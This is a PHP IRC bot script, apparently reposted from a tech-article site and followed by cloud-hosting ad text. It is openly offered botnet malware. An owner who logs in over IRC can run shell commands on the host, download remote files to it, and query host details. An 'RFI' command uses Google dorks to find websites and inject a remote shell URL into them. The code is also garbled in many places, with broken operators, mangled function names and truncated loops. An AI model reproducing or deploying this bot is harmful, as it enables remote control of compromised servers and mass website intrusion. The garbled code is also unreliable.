@set_time_limit (0);
function Randname () {
$nickparts = Array ("Gohan", "x4n4r", "C0la", "Mari0", "Johan", "Rex", "R00tz", "Smilee", "Sm4ck", "Nigr", "stench");
$tmp = "";
for ($i =0; $i <2; $i + +) {
$tmp = $nickparts [Mt_rand (0, Count ($nickparts)-1)]. Mt_rand (1000,9999);
}
return $tmp;
}
$sck = Fsockopen ($network, $port, $errno, $errstr) or Die ("Connection error:". $ERRSTR);
function Send ($msg, $to) {
Global $sck, $nick;
Fputs ($sck, "privmsg". $to. " " . $msg. "");
}
function Pong () {
Global $sck;
$dat = @fgets ($sck, 1024);
$d = Explode ("", $dat);
if ($d [0] = = "PING") {
Fputs ($sck, "PONG". $d [1]);
}
$dat = "";
}
function Get_exec_function () {
$exec _functions = Array ("Popen", "exec", "shell_exec");
$disabled _funcs = Ini_get (disable_functions);
foreach ($exec _functions as $f) if (Strpos ($disabled _funcs, $f) = = = False) return $f;
}
function Execute_command ($exec _function, $command, $to) {
if (! $exec _function) {
Send ("No execution functions ...", $to);
}
Switch ($exec _function) {
Case "Popen": $h = Popen ($command, "R"); while (!feof ($h)) Send (Fgets ($h), $to); Break
Case "EXEC": Exec ($command, $result); foreach ($result as $r) Send ($r, $to); Break
Case "Shell_exec": Send (Shell_exec ($command), $to); Break
}
}
function Get ($url, $out, $to) {
if (! $o = fopen ($out, "w"))
Send ("Unable to write file", $to);
else{
if (! $c = file_get_contents ($url))
Send ("Unable to open remote file", $to);
else{
if (!fwrite ($o, $c))
Send ("Unable to save file", $to);
else{
Send ("File saved", $to);
Fclose ($o);
}
}
}
}
function Encodedork ($s) {
$tmp = "";
for ($i =0; $i<>
$tmp. = "the". Hexdec (Bin2Hex ($s [$i]). ";";
}
Return UrlEncode ($TMP);
}
Function Shellinject ($url, $bug, $shell, $search) {
$url = explode ("/", $url);
$url = $url [2];
$url = (Strpos ($url, "www")!== false? "http://". $url: "http://www." $url). $bug. $shell. "??";
$ch = Curl_init ($url);
curl_setopt ($ch, Curlopt_returntransfer, true);
curl_setopt ($ch, Curlopt_header, 0);
curl_setopt ($ch, Curlopt_timeout, 4);
$ret = curl_exec ($ch);
$httpcode = Curl_getinfo ($ch, Curlinfo_http_code);
Curl_close ($ch);
if ($httpcode = =) {
if (Strpos ($ret, $search)!== false) {
return $url;
}
}
return false;
}
function Scan ($dork, $bug, $shell, $search, $to) {
Global $max _results;
if (function_exists (Curl_init)) {
$ch = Curl_init ("http://www.google.com/search?q=". Encodedork ($dork). "&start=0");
curl_setopt ($ch, Curlopt_returntransfer, true);
curl_setopt ($ch, Curlopt_header, 0);
$ret = curl_exec ($ch);
Curl_close ($ch);
Preg_match_all ("/of (about) * ([d,]+)/", $ret, $max);
$max = Str_replace (",", "", $max [2][0]);
$max = $max > $max _results? $max _results: $max;
$i = 0;
while ($i < $max) {
$ch = Curl_init ("http://www.google.com/search?q=". Encodedork ($dork). "&start=". $i);
curl_setopt ($ch, Curlopt_returntransfer, true);
curl_setopt ($ch, Curlopt_header, 0);
$ret = curl_exec ($ch);
Preg_match_all ("/
. *?/", $ret, $links);
if (@ $links [1]) {
foreach ($links [1] as $l) {
$ret = Shellinject ($l, $bug, $shell, $search);
if ($ret! = False) {
Send ("[+] Shell found:". $ret, $to);
}
}
}
else{
Send ("No sites found", $to);
}
Curl_close ($ch);
$i = $max >10? $i +=10: $i + +;
Send ("$i scanned", $to);
Pong ();
}
}
else{
Send ("CURL is not enabled", $to);
}
}
$nick = Randname ();
Sleep (1);
Fputs ($sck, "USER".) $nick. " ? * " . $nick. "@hotmail. com");
Sleep (1);
Fputs ($sck, "NICK". $nick. "");
$loggedin = false;
while (!feof ($sck)) {
$dat = Fgets ($sck, 4096);
$d = Explode ("", $dat);
Preg_match_all ("/:(. +)! (.+) Privmsg (. +): $trigger (w+) s* (. +) */", $dat, $cmd);
if ($d [0] = = "PING") {
Fputs ($sck, "PONG". $d [1]);
}
if (Strpos ($dat, "help REGISTER")!== false) {
Fputs ($sck, "JOIN". $channel. " " . $channel _password. "");
}
if (Preg_match ("/:(. +)!. + privmsg. +:. VERSION (.) /", $dat, $v)) {
Fputs ($sck, "NOTICE". $v [1]. " " . $v [2]. "VERSION MIRC v6.3 Khaled Mardam-bey". $v [2]. "");
}
if (@ $cmd [4][0]) {
$from = $cmd [1][0];
$from _host = $cmd [2][0];
$to = $cmd [3][0] = = $nick? $cmd [1][0]: $cmd [3][0];
$command = $cmd [4][0];
$args = $cmd [5][0];
if ($from = = $owner && $loggedin = = True) {
Switch ($command) {
Case "cmd": Execute_command (Get_exec_function (), $args, $to); Break
Case ' die ': fputs ($sck, "quit:received die from". $from); Die ();
Case "get": $a = Explode ("", $args); Get ($a [0], $a [1], $to); Break
Case "INF": Send ("Host:".) $_server[http_host]. "Whoami:". @exec (WhoAmI), $to); Break
Case "Raw": fputs ($sck, $args. ""); Break
Case "RFI": $a = Explode ("", $args);
if (count ($a) > 3) {Send ("Beginning RFI Scan", $to), scan ($a [0], $a [1], $a [2], $a [3], $to); Send ("RFI scan complete", $to );}
else Send ("Usage: (dork) (bug) (shell) (search)", $to);
Break
Case "say": Send ($args, $to); Break
Default:send ("Unknown command.", $to);
}
}
ElseIf ($from = = $owner && $loggedin = = False) {
if ($command = = "Login") {
if (MD5 ($args) = = $owner _password) {
$loggedin = true;
Send ("User $from successfully logged in.", $to);
}
else{
Send ("Login failed.", $to);
}
}
}
}
$dat = "";
}
?>
Credits Flyz To:array ("Gohan", "x4n4r", "C0la", "Mari0", "Johan", "Rex", "R00tz", "Smilee", "Sm4ck", "Nigr", "stench");
Has fun. =)
http://www.bkjia.com/PHPjc/508526.html www.bkjia.com true http://www.bkjia.com/PHPjc/508526.html techarticle ? php//config//////////////////////////////////////////////////////////////////$network = ""; IRC network address//$port = 6667; IRC network port//$channel = ""; IRC ...
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
